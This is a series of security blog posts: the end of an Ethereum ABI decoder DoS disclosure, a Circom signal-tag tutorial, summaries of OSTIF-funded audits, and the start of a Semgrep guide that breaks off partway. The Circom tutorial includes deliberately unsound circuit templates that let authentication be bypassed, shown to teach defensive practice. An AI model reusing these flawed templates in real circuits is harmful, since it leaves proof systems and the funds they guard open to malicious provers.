The libraries go-ethereum and ethers.js do not have this bug because they implicitly disallow ZST. The libraries expect that each element of an array is at least 32 bytes long. The web3.js library is also not affected because it uses ethers-js.

How the bug was discovered

The idea for testing for this type of bug came after I stumbled upon an issue in the borsh-rs library. The Rust library tried to parse an array of ZST in constant time, which caused undefined behavior, in order to mitigate the DoS vector. The library’s authors ultimately decided to simply disallow ZST completely. During another audit, a custom ABI parser also had a DoS vector when parsing ZSTs. Seeing as these two issues were unlikely to be a coincidence, we investigated other ABI parsing libraries for this bug class.

How to exploit it

Whether this bug is exploitable depends on how the affected library is used. In the examples above, the demonstration targets were CLI tools.

I did not find a way to craft a smart contract that triggers this bug and deploys it to the mainnet. This is mainly because Solidity and Vyper programs disallow ZST in their latest version.

However, any application that uses one of the above libraryis potentially vulnerable. An example of a potentially vulnerable application is Etherscan, which parses untrusted ABI declarations. Also, any off-chain software fetching and decoding data from contracts could be vulnerable to this bug if it allows users to specify ABI types.

Fuzz your decoders!

Bugs in decoders are usually easy to catch through fuzzing the decoding routine because inputs are commonly byte arrays that can be used directly as input for fuzzers. Of course, there are exceptions, like the recent libwebp 0-day (CVE-2023-4863) that was not discovered through endless hours of fuzzing in OSS-fuzz.

In our audits at Trail of Bits, we employ fuzzing to identify bugs and educate clients on how to conduct their own fuzzing. We aim to contribute our fuzzers to Google’s OSS-fuzz for continual testing, thus supplementing manual reviews by prioritizing crucial audit components. We’re updating our Testing Handbook, an exhaustive resource for developers and security professionals to include specific guidance for optimizing fuzzer configuration and automation of analysis tools throughout the software development lifecycle.

Coordinated disclosure

As part of the disclosure process, we reported the vulnerabilities to the library authors.

  • eth_abi (Python): The Ethereum-owned library fixed the bug as part of a private GitHub advisory. The bug was fixed in version v4.2.0.
  • ethabi (Rust) and alloy-rs: The maintainers of the crates asked that we open GitHub issues after the end of the embargo period. We created the corresponding issues here and here.
  • ethereumjs-abi: We got no response from the project and thus created a GitHub issue.
  • ethers-rs and foundry: We informed the projects about their usage of ethabi (Rust). We expect they will update to the patched versions of ethabi as soon as they are available or switch to another ABI decoding implementation. The general community will be notified by releasing a RustSec advisory for ethabi and alloy-rs and a GitHub advisory for eth_abi (Python).

The timeline of disclosure is provided below:

  • June 30, 2023: Initial reach out to maintainers of ethabi (Rust), eth_abi (Python), alloy-rs and ethereumjs-abi crates.
  • June 30, 2023: Notification by the alloy-rs maintainers that a GitHub issue should be created.
  • June 30, 2023: First response by the eth_abi (Python) project and internal triaging started.
  • July 26, 2023: Clarifying ethabi’s maintenance status through a GitHub issue. This led to a notice in the README file. This means we are going to post a GitHub issue after the embargo.
  • August 2, 2023: Created private security advisory on GitHub for eth_abi (Python).
  • August 31, 2023: Fix is published by eth_abi (Python) without public references to the DoS vector. We later verified this fix.
  • December 29, 2023: Publication of this blog post and GitHub issues in the ethabi, alloy-rs, and ethereumjs-abi repositories.

Tag, you’re it: Signal tagging in Circom

2 January 2024 at 14:00

By Tjaden Hess

We at Trail of Bits perform security reviews for a seemingly endless stream of applications that use zero-knowledge (ZK) proofs. While fast new arithmetization and folding libraries like Halo2, Plonky2, and Boojum are rapidly gaining adoption, Circom remains a mainstay of ZK circuit design. We’ve written about Circom safety before in the context of Circomspect, our linter and static analyzer; in this post, we will look at another way to guard against bugs in your Circom circuits using a lesser-known language feature called signal tags. We present four simple rules for incorporating signal tags into your development process, which will help protect you from common bugs and facilitate auditing of your codebase.

This post assumes some familiarity with the Circom language. We will examine some simple Circom programs and demonstrate how signal tags can be used to detect and prevent common classes of bugs; we will also point out potential pitfalls and weaknesses of the signal tagging feature.

Warning: For the remainder of this post, we will be working with Circom 2.1.6. Details of tag propagation have changed since 2.1.0—we highly recommend using version 2.1.6 or higher, as earlier versions contain severe pitfalls not mentioned in this post.

What are signal tags?

Signal tagging is a feature introduced in Circom 2.1.0 that allows developers to specify and enforce—at compile time—ad hoc preconditions and postconditions on templates. Circom tags help developers ensure that inputs to templates always satisfy the requirements of the template, guarding against soundness bugs while reducing duplication of constraints.

Here is the CircomLib implementation of the boolean OR gate:

template OR() {
    signal input {binary} a;
    signal input {binary} b;
    signal output {binary} out;

    out <== a + b - a*b;
}

circomlib/circuits/gates.circom#37–43

Assume that we are writing a ZK circuit that requires proof of authentication whenever either of two values (e.g., outgoing value transfers) is nonzero. An engineer might write this template to enforce the authentication requirement.

// Require `authSucceeded` to be `1` whenever outgoing value is nonzero
template EnforceAuth() {
    signal input valueA;
    signal input valueB;
    signal input authSucceeded;

    signal authRequired <== OR()(valueA, valueB);
    (1 - authSucceeded) * authRequired === 0;
}

When tested with random or typical values, this template will seem to behave correctly; nonzero values of valueA and valueB will be allowed only when authSucceeded is 1.

However, what about when valueA == valueB == 2? Notice that authRequired will be zero and thus the desired invariant of EnforceAuth will be violated.

So what went wrong? There was an implicit precondition on the OR template that a and b both be binary—that is, in the set {0,1}. Violating this condition leads to unexpected behavior.

One way to approach the issue is to add constraints to the OR gate requiring that the inputs be binary:

template OR() {
    signal input a;
    signal input b;
    signal output out;

    // Constrain a and b to be binary
    a * (1 - a) === 0;
    b * (1 - b) === 0;
    
    out <== a + b - a*b;
}

The problem with this approach is that we have just tripled the number of constraints needed per OR gate. Often the inputs will have already been constrained earlier in the circuit, which makes these constraints purely redundant and needlessly increases the compilation and proving time.

In many languages, input constraints would be expressed as types. Circom, unlike more flexible API-driven frameworks like Halo2, does not support expressive types; all signals can carry any value between 0 and P. However, Circom 2.1.0 and higher does support signal tags, which can be used as a sort of ad-hoc type system.

Let’s see how the OR template would look using signal tags:

template OR() {
    signal input {binary} a;
    signal input {binary} b;
    signal output {binary} out;

    out <== a + b - a*b;
}

Notice that the logic is entirely unchanged from the original; tags do not affect the compiled constraint system at all. However, if we try compiling the EnforceAuth template now, we get a compiler error:

Unset
error[T3001]: Invalid assignment: missing tags required by input signal.
 Missing tag: binary
   ┌─ "example1.circom":18:26
   │
18 │     signal authRequired <== OR()(valueA, valueB); │ ^^^^^^^^^^^^^^^^^^^^ found here │ = call trace: ->EnforceAuth

previous errors were found

Input tags are preconditions: requirements that inputs to the template must satisfy. By attaching a signal tag to the input, a developer indicates that the corresponding property must already be enforced; the template itself may assume but not enforce the condition.

Pretty cool! Now how do we rewrite the program to properly use tags? Let’s define a new template that properly checks if each value is zero before computing the OR value.

// `out` is 1 whenever `in` is nonzero, or 0 otherwise
template ToBinary() {
    signal input in;
    // POSTCONDITION: out is either 0 or 1
    // PROOF:
    // in != 0 => out == 1 (by constraint (2))
    // in == 0 => out == 0 (by constraint (1))
    signal output {binary} out;
    
    signal inv <-- in!=0 ? 1/in : 0;
    out <== in*inv;
    in*(1 - out) === 0;
}

This is essentially the negation of CircomLib IsZero template, normalizing the input and adding binary tag to the output. Note that binary is just an arbitrary string – Circom does not know anything about the semantics that we intend binary to have and in particular does not check that out is in the set {0,1}. Circom simply attaches the opaque tag binary to the output wire of IsZero.

Output tags are postconditions: promises that the developer makes to downstream users of the signal.

Note that, as Circom does not check our postconditions for us, we must be very careful not to accidentally assign a label to a signal that could possibly carry a value outside the allowed values for the tag. In order to keep track of all the potential ways that a signal can be assigned a tag, we recommend including a comment just above any template output with tags, explaining the reason that the postcondition is satisfied.

Now we can plug this into our EnforceAuth circuit, and everything compiles!

// Require `authSucceeded` to be `1` whenever outgoing value is nonzero
template EnforceAuth() {
    signal input valueA;
    signal input valueB;
    signal input authSucceeded;

    signal spendsA <== ToBinary()(valueA);
    signal spendsB <== ToBinary()(valueB);

    signal authRequired <== OR()(spendsA, spendsB);
    (1 - authSucceeded) * authRequired === 0;
}

Under the hood, Circom is propagating the tag attached to the output signal of ToBinary, so that spendsA also has the tag. Then when OR checks that its input has the binary tag, it is satisfied.

Tag propagation

Tags are propagated through direct assignment, but not through arithmetic operations. In the following example, signal x acquires the binary tag from in.

template Example {
    signal input {binary} in;

    // x gets the `binary` tag
    signal x <== in;
    // one_minus_x does not have the `binary` tag;
    signal one_minus_x <== 1 - x;

// Compiler Error
    1 === OR()(x, one_minus_x);
    
    // Assume NOT is defined to return a binary output, like OR.
    signal not_x <== NOT()(x);
    // Then this is OK
    1 === OR()(x, not_x);
}

Elements of a signal array have a tag if and only if all members of the array have that tag.

template Example {
    signal input {binary} a;
    signal input {binary} b;
    signal input c;
    
       // xs does not have tag `binary` because `c` does not have the tag
    signal xs[3] <== [a, b, c];

    // Error: missing tag
    1 === OR()(xs[0], xs[1]);
}

Tags with value

A common source of soundness bugs in zero-knowledge circuits occurs when arithmetic operations unexpectedly overflow the finite field modulus. Signal tags in Circom can also carry values, which are compile time variables that are propagated along with the tag. Using tags with value, we can ensure at compile time that operations never overflow.

template EnforceMaxBits(n) {
    assert(n < 254); // Number of bits in the finite field 
    signal input in;

    // REASON: Num2Bits constrains in to be representable by `n` bits
    signal output {maxbits} out;
    out.maxbits = n;

    Num2Bits(n)(in);
    out <== in;
}

// Add two numbers, ensuring that the resut does not overflow
template AddMaxBits(){
    signal input {maxbits} a;
    signal input {maxbits} b;

    // REASON: log(a + b) <= log(2*max(a, b)) = 1 + max(log(a), log(b))
    signal output {maxbits} c;
    c.maxbits = max(a.maxbits, b.maxbits) + 1
    assert(c.maxbits < 254);

    c <== a + b;
}

// Multiply two numbers, ensuring that the resut does not overflow
template MulMaxBits(){  
    signal input {maxbits} a;
    signal input {maxbits} b;

    // REASON: log(a * b) = log(a) + log(b)
    signal output {maxbits} c;
    c.maxbits = a.maxbits + b.maxbits;
    assert(c.maxbits < 254);

    c <== a * b;
}

Tag values must be assigned before the signal is assigned. If a tag value propagates via signal assignment to a signal that already has a different tag value, Circom will throw an error.

Avoiding incorrect tag assignment

While signal tags can help prevent programming errors, the language feature syntax easily allows for accidental or unwarranted addition of tags to signals. Incorrectly assigning a tag to a signal that is not constrained to abide by the rules of that tag undermines the guarantees of the tag system and can easily lead to severe security issues. In order to get the full benefit of signal tags, we recommend strictly adhering to these usage rules.

Rule #1: Output and internal tag annotations must be accompanied by an explanatory comment

We mentioned before that adding tag annotations to output signals is dangerous. Internal signals can also be declared with a tag annotation, which unconditionally adds the tag to the signal. For example, this unsafe modification of the original EnforceAuth program uses tagged internal signals:

// Require `authSucceeded` to be `1` whenever outgoing value is nonzero
template EnforceAuth() {
    signal input valueA;
    signal input valueB;
    signal input authSucceeded;

    // These signals acquire the `binary` tag
// _without_ any checks that the values are in fact binary
// This is UNSAFE
    signal {binary} spendsA <== valueA;
    signal {binary} spendsB <== valueB;

    signal authRequired <== OR()(valueA, valueB);
    (1 - authSucceeded) * authRequired === 0;
}

We strongly recommend that manually tagged internal and output signals be avoided when possible. Any output or internal signal tag annotations must be accompanied by a comment explaining why the tag requirements are satisfied.

Rule #2: Tags should be added to signals using dedicated library templates

In order to minimize the use of manual signal tag annotation in high-level code, we recommend providing a library of helper templates comprising a safe API for using the tag. The following code exemplifies a library for binary values that contains constructors and type-safe operators.

// binary.circom
// Tags:
//     binary: signals must be either 0 or 1

// Create a binary value from a constant 0 or 1
template BinaryConstant(b){
    // REASON: Only valuid values are allowed at compile time
    signal output {binary} out;
    assert(b == 0 || b == 1);
    out <== b;
}

// Constrains a sinal to be binary and returns a tagged output
template EnforceBinary(){
    signal input in;
    // REASON: Only solutions to x*(x-1) = 0 are 0 and 1
    signal output {binary} out;
    
    in * (in - 1) === 0;
    out <== in;
}

// Empty template simply asserts that input is tagged
// Useful for checking / documenting post conditions on output signals
template AssertBinary() {
    signal input {binary} in;
}

// Returns 1 when input is "truthy" (nonzero), 0 when input is zero
template ToBinary() {
    signal input in;
    // REASON:
    // in != 0 => out == 1 (by constraint (2))
    // in == 0 => out == 0 (by constraint (1))
    signal output {binary} out;
    
    signal inv <-- in!=0 ? 1/in : 0;
    out <== in*inv;
    in*(1 - out) === 0;
}

template AND(){
    signal input {binary} a;
    signal input {binary} b;
    // REASON: 1*1 = 1, 1*0 = 0, 0*1 = 0, 0*0 = 0
    signal output {binary} out <== a*b;
}

template NOT(){
    signal input {binary} in;
    // REASON: 1 - 0 = 1, 1 - 1 = 0
    signal output {binary} out <== 1 - in;
}

template OR() {
    signal input {binary} a;
    signal input {binary} b;
    // REASON: a = 0 => out = b - 0*b = b, a = 1 => out = 1 + b - 1*b = 1
    signal output {binary} out;

    out <== a + b - a*b;
}

Once a sufficiently rich library of templates has been established, developers should rarely need to manually add a tag elsewhere. Reducing the number of manual tags makes auditing for correctness much easier.

Postconditions of higher-level templates can be documented using assertion templates like AssertBinary, without using output tag annotations:

template IsZero() {
    signal input in;
    // POSTCONDITION: out has `binary` tag
    signal output out; // Avoid risky output tag annotation here
    
    signal isNonZero <== ToBinary()(in); // Avoid risky internal tag annotation here
    
    out <== Not()(isNonZero);
    
    AssertBinary()(out); // Document and check postcondition with no runtime cost
}

Rule #3: Explicit tag value assignments should be scarce and documented

Most tag values should be assigned automatically by library functions, as in the maxbits example. Whenever a signal is assigned a tag value, an explanatory comment should be nearby.

Rule #4: Tag- with-value must always have a value

Every tag in the codebase must either always have an associated value or never have an associated value. Mixing the two can cause confusion, especially when dealing with signal arrays.

A real-world example

We will look at two issues from our review of Succinct Labs’ Telepathy and explain how Circom tags could have been used to prevent them.

Telepathy is an implementation of the Ethereum sync committee light client protocol, using zkSNARKs written in Circom to accelerate verification of aggregate BLS signatures. The exact details of ETH2.0 light clients and BLS aggregation are not required to understand the bugs, but a refresher on elliptic curves and some notes on big-integer arithmetic in Circom will be useful.

The ETH2.0 light client protocol uses aggregate BLS signatures over the BLS12-381 curve1. Public keys are points (X, Y) on the BLS12-381 curve, where Y2 = X3 + 4 mod Q where Q is a 381-bit prime. Notice that the coordinates of the BLS public keys are 381 bits, while Circom signals can represent at most 254 bits. In order to represent a single public key coordinate, circom-pairing uses seven Circom signals (called “limbs”), each holding a 55-bit value. In order to ensure that representations of big integers are unique and to prevent overflow during arithmetic operations, the developer must ensure that the value of each limb is less than 255.

Ethereum blocks contain commitments to the sync committee public keys in compressed form, meaning that the keys are stored as an X coordinate plus one extra bit to indicate the sign of Y.2 In order to perform arithmetic operations with the curve points, the Telepathy circuits require the prover to provide the Y coordinate corresponding to the public key X coordinate. This Y value is then validated by the SubgroupCheckG1WithValidX template, which in turn enforces that the curve equation holds.

/* VERIFY THAT THE WITNESSED Y-COORDINATES MAKE THE PUBKEYS LAY ON THE CURVE */
    
component isValidPoint[SYNC_COMMITTEE_SIZE];
for (var i = 0; i < SYNC_COMMITTEE_SIZE; i++) {
    isValidPoint[i] = SubgroupCheckG1WithValidX(N, K);
    for (var j = 0; j < K; j++) {
        isValidPoint[i].in[0][j] <== pubkeysBigIntX[i][j];
        isValidPoint[i].in[1][j] <== pubkeysBigIntY[i][j];
    }
}

telepathy-circuits/circuits/rotate.circom#L101-L109

template SubgroupCheckG1WithValidX(n, k){
    signal input in[2][k];
    var p[50] = get_BLS12_381_prime(n, k);
    var x_abs = get_BLS12_381_parameter();
    var b = 4;
    component is_on_curve = PointOnCurve(n, k, 0, b, p);
    for(var i=0; i<2; i++)for(var idx=0; idx<k; idx++)
        is_on_curve.in[i][idx] <== in[i][idx];
}

telepathy-circuits/circuits/pairing/bls12_381_hash_to_G2.circom#L723-L731

However, PointOnCurve assumes that the inputs are properly formatted big integers—in particular that each of the k limbs of Y is less than 2n. This check is never enforced, however, leading to uncontrolled overflow in the intermediate computations. Using this vulnerability, a malicious prover can cause the protocol to become stuck in an irrecoverable state, freezing the light client and any bridge funds depending on continued operation.

Using signal tags could have prevented this bug (TOB-SUCCINCT-1) and two others (TOB-SUCCINCT-2, TOB-SUCCINCT-14) that we found during the review. Properly formed big integer values should have a maxbits tag with a value corresponding to the size of the limbs (in this case, 55). BLS12-381 coordinates should additionally have a fp tag indicating that they are reduced modulo the base field prime. Together these two tags, used to indicate preconditions for templates that expect big integers and reduced finite field elements, would have prevented three major missing constraints in the final circuit.

Conclusion

Circom tags are a powerful feature for preventing bugs due to type confusion, missing range checks, and other common missing constraints. In order to receive the full benefits of the feature and hold yourself accountable for good development practices, follow the four simple rules above.

Tags are not a full solution to ZK circuit security. There are many other types of logic, arithmetic, and integration bugs that can compromise the security of your system. Don’t hesitate to contact us with any questions, and reach out if you would like us to review, specify, or implement any ZK circuit or protocol.

1The “BLS” acronyms in BLS signatures (Boneh–Lynn–Shacham) and BLS curves (Barreto-Lynn-Scott) overlap only for Ben Lynn, whose thesis on pairings is an excellent resource.
2For any X there are at most two corresponding Y values, of the form sqrt(X3 + 4), -sqrt(X3 + 4).

Securing open-source infrastructure with OSTIF

9 January 2024 at 14:00

The Open Source Technology Improvement Fund (OSTIF) counters an often overlooked challenge in the open-source world: the same software projects that uphold today’s internet infrastructure are reliant on, in OSTIF’s words, a “surprisingly small group of people with a limited amount of time” for all development, testing, and maintenance.

This scarcity of contributor time in the open-source community is a well-known problem, and it renders the internet’s critical infrastructure vulnerable. To quote OSTIF, “because of the lack of a profit motive, core open-source projects are woefully underfunded and their resources are lacking. This leaves crucial Internet infrastructure susceptible to bugs, poor documentation, poor performance, slow release schedules, and even espionage.”

We couldn’t agree more.

Over the past year, we’ve had the pleasure of collaborating with open-source project teams through OSTIF on threat modeling assessments and secure code reviews. We believe our central mission of boldly advancing security and addressing technology’s most challenging risks closely aligns with OSTIF’s goals. Through our partnership with OSTIF, we have made significant contributions that improve the security posture of the open-source community. This blog post highlights some recent security assessments that OSTIF engaged Trail of Bits to conduct.

About our work

At Trail of Bits we do many types of security work. Some of our more popular offerings include secure code review powered by bespoke fuzzing harness and fuzz test development, our custom static analysis rulesets, and targeted manual review; threat modeling exercises involving architectural review, systems thinking, and threat scenario development; CI/CD pipeline hardening; and fix reviews. Optimally, an assessment involves engineers with expertise in several of these areas. This helps us provide our clients with the best value for their dollar.

Sometimes, we involve different types of expertise in an engagement by, for example, running threat modeling exercises and then performing a code review for the same client. When we follow threat modeling work with secure code review, our code review can start from the design-level findings that our threat modeling work resulted in. This means we can write fuzzing harnesses and fuzz tests targeting the most vulnerable areas of a given codebase more quickly! Following our secure code review with a fix review then gives our security engineers the chance to help guide and reassess the mitigations implemented based on our findings.

Due to the wide range of clients who engage us, client expectations and requirements can vary. In the OSTIF-organized assessments we’ll cover below, you’ll see different combinations of these types of work. Some of these engagements included both a threat modeling exercise and a secure code review, while others just focused on code review. Common to all of these projects is our development of a tailored security assessment strategy based on the nature of the project and the client’s needs.

Linux kernel release signing

The Linux kernel runs on devices from ordinary smartphones, to the servers that make up the web’s most widely used infrastructure, to supercomputers. The internet as we know it effectively runs on Linux. A critical part of Linux development is kernel release signing, which allows users to cryptographically verify the authenticity of kernel releases to ensure their trustworthiness.

In this review, which took place from March to April of 2021, we led technical discussions with the Linux Foundation and examined their documentation on the kernel release signing process. Our assessment included an audit of the management of signing keys, developers’ workflow for signing, and the cryptographic algorithms involved in the signing and verification steps.

One of our major recommendations was that the Linux Foundation enforce the use of smart cards to store private keys, which would prevent an attacker who compromises a developer’s workstation from being able to sign malicious code. We also advised that the Linux Foundation adopt wider key distribution methods to mitigate a compromise of the git.kernel.org server currently hosting public keys, replace older signature schemes like RSA and DSA with modern and more robust alternatives like ECDSA and Ed25519, and create documentation on key management policies to prevent mistakes in the signing process.

For further information about our findings and recommendations, refer to OSTIF’s announcement of the engagement and our full report.

CloudEvents

The CNCF Serverless Working group created the CloudEvents specification to standardize event declaration and delivery in a consistent, accessible, and portable way. It provides a standard format to share events across disparate cloud providers and toolsets, as well as SDKs in several programming languages.

From September to October of 2022, we performed a lightweight threat modeling assessment with the CloudEvents team, working to identify methods an attacker might use to compromise systems that implement the specification. Our team then followed up with a secure code review of the JavaScript, Go, and C# CloudEvents SDKs. For this engagement, we used a combination of automated testing tools, manual analysis, and a review of overall architecture and design. In total, we identified seven issues, including potential cross-site scripting in the JavaScript SDK and several vulnerable dependencies of all three SDKs.

Our final report includes these findings, the threat model we developed, several code quality recommendations, and guidance for using automated analysis tooling on the SDK codebases. Get all the details in OSTIF’s announcement of the engagement and our full report.

curl

It would be an understatement to say that curl is everywhere. This famous utility enables users to transfer data across a plethora of network protocols, with over 20 billion installations in “cars, television sets, routers, printers, audio equipment, mobile phones, tablets, set-top boxes, [and] media players,” according to curl’s website.

Thanks to OSTIF, our team had the privilege of conducting a review of both the curl binary and software library (libcurl) from September to October of 2022. We began our audit with a threat modeling assessment, a crucial exercise that deepened our understanding of the curl and libcurl internal components and how they work together. The resulting threat model significantly influenced our approach to reviewing the actual source code, concretizing our understanding of curl’s internals and helping us to decide which components to initially target for fuzzing and secure code review.

By the end of our code review, we found 14 issues, including two high-severity memory corruption vulnerabilities identified through fuzzing, which we conducted in parallel with our manual secure code review efforts. We helped expand curl’s fuzzing coverage and, through fuzzing that continued after the review ended, found several vulnerabilities including CVE-2022-42915, CVE-2022-43552, and a significant finding that started out as an off-hand joke. Check out our curl fuzzing coverage improvements and findings in the final report.

Kubernetes Event-Driven Autoscaling (KEDA)

KEDA is an automated scaling tool for Kubernetes containers. It comes with built-in support for numerous “scalers,” interfaces that can trigger scaling based on messages received from configured external sources, such as AWS SQS, RabbitMQ, and Redis Streams. KEDA efficiently manages the addition of Kubernetes pods to meet measured demand.

We started our review of KEDA in December of 2022 with a threat modeling exercise, walking through threat scenarios with the KEDA team. Using the threat model to inform our approach, we then conducted a code review. Our team used automated testing and manual review to discover eight findings. Among these findings was a failure to enable Transport Layer Security (TLS) for communication with Redis servers, creating a vulnerability that an attacker could exploit for person-in-the-middle attacks.

In addition to these findings, our final report presents our threat model, an evaluation of KEDA’s codebase maturity, a custom Semgrep rule we wrote to detect an encoding issue that we noticed was a pattern in the code, and long-term recommendations aimed at helping KEDA proactively enhance its overall security posture. Refer to our full report for more details.

Eclipse Mosquitto

In March of 2023, Trail of Bits had the opportunity to work with the Eclipse Foundation to assess the Mosquitto project. Mosquitto includes a popular MQTT message broker and client library (libmosquitto). Mosquitto has a broad range of applications, from home automation to bioinformatics to railway signaling infrastructure in the United Kingdom.

During this two-part engagement, we developed a threat model and then performed a secure code review of the broker application, libmosquitto, and associated command-line tools (e.g., mosquitto_passwd). Our threat model identified architecture-level weaknesses such as a lack of configurable global rate limiting in the broker and inadequate defenses against denial of service from infinite message looping. See our threat model report for these discoveries and more.

Our findings from the secure code review included a remotely triggerable buffer over-read in the broker that would cause heap memory to be dumped to disk, multiple file handling issues that could allow unauthorized users to access password hashes, and improper parsing of an HTTP header that could enable an attacker to bypass auditing capabilities and IP-based access controls for the Mosquitto WebSocket transport. Read more about these findings in our secure code review report.

Eclipse Jetty

Jetty is one of the oldest and most popular Java web server frameworks. It integrates with numerous other open-source applications including Apache Spark, Apache Maven, and Hadoop, as well as proprietary software like Google App Engine and VMWare’s Spring Boot. We were engaged to perform a lightweight threat model, secure code review, and fix review in March of 2023.

Due to the size of the Jetty codebase and the limited amount of time we had for threat modeling during this engagement, after determining the security controls to assess, we conducted a lightweight threat modeling exercise focused on identifying specific potential threats and insecure architectural patterns across components, rather than shallowly touching on many potential vulnerability types. Notable threat scenarios we discussed with the Jetty team included the implications of unsafe defaults; for example, we found that Jetty lacked default connection encryption, which could allow person-in-the-middle attacks against Jetty client connections, and that headers were inconsistently parsed, which could allow request smuggling or lead to other issues during, for example, HTTP/2 to HTTP/1 downgrade.

Oriented by the scenarios we explored during the threat modeling exercise, we conducted a three-week-long code review of Jetty. We discovered 25 findings including a possible integer overflow when parsing HTTP/2 HPACK headers (CVE-2023-36478) leading to resource exhaustion, a command injection vulnerability due to erroneous command-line argument escaping (CVE-2023-36479), and an XML external entity (XXE) injection vulnerability in the Maven metadata file parser. Our full report includes our threat model, codebase maturity evaluation, full list of findings, and fix review.

Eclipse JKube

JKube is a collection of helpful plugins and libraries for building, editing, and deploying Docker and OCI containers with Kubernetes or Red Hat OpenShift, integrating directly with Maven and Gradle. JKube can also connect to the external Kubernetes or OpenShift cluster to watch, debug, and log events. Working with the JKube maintainers between March and May of 2023, we conducted a lightweight threat model, a secure code review, and a fix review evaluating changes made to JKube after our secure code review.

After developing an understanding of the many JKube components, dependencies, and integrations, we discussed several potential threat scenarios with the JKube maintainers. Our threat modeling exercise identified a lack of common security defaults and a number of unsafe default settings, as well as general patterns of insufficient, handwritten sanitization for multiple input format types and unsafe Java deserialization practices. Our secure code review tested and expanded on our findings regarding unsafe defaults in JKube-generated artifacts. Our fix review validated that the JKube maintainers’ code changes sufficiently mitigated our code review findings. Check out our full report.

Flux

A CNCF-graduated project, Flux is a GitOps and continuous delivery tool that keeps Kubernetes state synchronized with configuration stored in a source such as a Git repository. OSTIF engaged Trail of Bits for a secure code review of Flux between July and August of 2023.

Our review resulted in 10 findings, including a path traversal vulnerability that an attacker could exploit to write to files outside of a specified root directory, particularly when Flux is included as a library in other applications. Other issues we noted included a failure to set an expiration date on cached sensitive data and a dynamic library injection vulnerability in the Flux macOS binary stemming from the fact that Apple’s Hardened Runtime feature wasn’t enabled.

Our final report includes the details of all of our findings, a codebase maturity evaluation, several code-quality issues that could contribute to a weaker security posture but were not thought to have an immediate security impact, and recommendations for incorporating regular analysis from the static analysis tools we used during the assessment into Flux’s CI/CD pipeline.

Dragonfly

Dragonfly is a peer-to-peer file distribution and image acceleration system. A CNCF-hosted project, Dragonfly features integrity checking for downloaded files, download speed limiting, the ability to isolate abnormal peers, and a public registry of artifacts that aims to be “the trusted cloud native repository for Kubernetes.” A subproject of Dragonfly, Nydus implements a content-addressable filesystem to enable high-efficiency distribution for cloud-native resources.

In July of 2023, Trail of Bits reviewed the Dragonfly codebase. Nineteen findings resulted from our secure code review, including five high-severity issues. Our findings included multiple server-side request forgery (SSRF) vulnerabilities that could enable unauthorized attackers to access internal services, an issue in the peer-to-peer API that could allow attackers to read and write to any file on a peer’s machine, and the ability for a peer to render the mTLS authentication scheme ineffective by obtaining a valid TLS certificate for any IP address.

Along with the details of our findings, our final report includes a codebase maturity evaluation, a list of code quality issues, guidance for running static and dynamic analysis tooling on the Dragonfly codebase, and our fix review.

What the future holds

These engagements may be complete, but we will continue to demonstrate our dedication to securing the internet’s open-source infrastructure going forward. We’re always learning, too! We iterate on and improve our methods, static analysis rulesets, and tooling with every assessment, incorporating new techniques and automated testing strategies, as well as client feedback. Expect more content in early 2024 about our ongoing and future work in partnership with OSTIF, including discussions of two more secure code reviews that are currently in progress. We also plan to publish a deep dive into the improvements we made to curl’s fuzzing infrastructure and technical details of some of the more interesting vulnerabilities we found during our OSTIF-organized OpenSSL and Mosquitto engagements.

Concurrently, Trail of Bits will continue supporting OSTIF’s mission through fix reviews (where contracted) for our completed secure code reviews and threat models to ensure that the vulnerabilities and design flaws we identified are mitigated. We’re very excited to take on further work that OSTIF has for us, whether it be threat modeling, secure code review, or providing security guidance in other ways.

How to introduce Semgrep to your organization

12 January 2024 at 14:00

By Maciej Domanski, Application Security Engineer

Semgrep, a static analysis tool for finding bugs and specific code patterns in more than 30 languages, is set apart by its ease of use, many built-in rules, and the ability to easily create custom rules. We consider it an essential automated tool for discovering security issues in a codebase. Since Semgrep can directly improve your code’s security, it’s easy to say, “Just use it!” But what does that mean?

Semgrep is designed to be flexible to fit your organization’s specific needs. To get the best results, it’s important to understand how to run Semgrep, which rules to use, and how to integrate it into the CI/CD pipeline. If you are unsure how to get started, here is our seven-step plan to determine how to best integrate Semgrep into your SDLC, based on what we’ve learned over the years.

The 7-step Semgrep plan

1.Review the list of supported languages to understand whether Semgrep can help you.

2.Explore: Try Semgrep on a small project to evaluate its effectiveness. For example, navigate into the root directory of a project and run:
$ semgrep --config auto

There are a few important notes to consider when running this command:

  • The --config auto option submits metrics to Semgrep, which may not be desirable.
  • Invoking Semgrep in this way will present an overview of identified issues, including the number and severity. In general, you can use this CLI flag to gain a broad view of the technologies covered by Semgrep.
  • Semgrep identifies programming languages by file extensions rather than analyzing their contents. Some paths are excluded from scanning by default using the default .semgrepignore file. Additionally, Semgrep excludes untracked files listed in a .gitignore file.

3.Dive deep: Instead of using the auto option, use the Semgrep Registry to select rulesets based on key security patterns, and your tech stack and needs.

  • Try:
    $ semgrep --config p/default
    $ semgrep --config p/owasp-top-ten
    $ semgrep --config p/cwe-top-25

or choose a ruleset based on your technology:

$ semgrep --config p/javascript

  • Focus on rules with high confidence and medium- or high-impact metadata first. If there are too many results, limit results to error severity only using the --severity ERROR flag.
  • Resolve identified issues and include reproduction instructions in your bug reports.

4.Fine-tune: Obtain your ideal rulesets chain by reviewing the effectiveness of currently used rulesets.

  • Check out non-security rulesets, too, such as best practices rules. This will enhance code readability and may prevent the introduction of vulnerabilities in the future. Also, consider covering other aspects of your project:
    • Shell scripts, configuration files, generic files, Dockerfiles
    • Third-party dependencies (Semgrep Supply Chain, a paid feature, can help you detect if you are using the vulnerable package in an exploitable way)
  • To ignore the incorrect code pattern by Semgrep, use a comment in your code on the first line of a preceding line of the pattern match, e.g., // nosemgrep: go.lang.security.audit.xss. Also, explain why you decided to disable a rule or provide a risk-acceptance reason.
  • Create a customized .semgrepignore file to reduce noise by excluding specific files or folders from the Semgrep scan. Semgrep ignores files listed in .gitignore by default. To maintain this, after creating a .semgrepignore file, add .gitignore to your .semgrepignore with the pattern :include .gitignore.

5.Create an internal repository to aggregate custom Semgrep rules specific to your organization. A README file should include a short tutorial on using Semgrep, applying custom rules from your repository, and an inventory table of custom rules. Also, a contribution checklist will allow your team to maintain the quality level of the rules (see the Trail of Bits Semgrep rule development checklist). Ensure that adding a new Semgrep rule to your internal Semgrep repository includes a peer review process to reduce false positives/negatives.

6.Evangelize: Train developers and other relevant teams on effectively using Semgrep.

  • Present pilot test results and advice on improving the organization’s code quality and security. Show potential Semgrep limitations (single-file analysis only).
  • Include the official Learn Semgrep resource and present the Semgrep Playground with “simple mode” for easy rule creation.
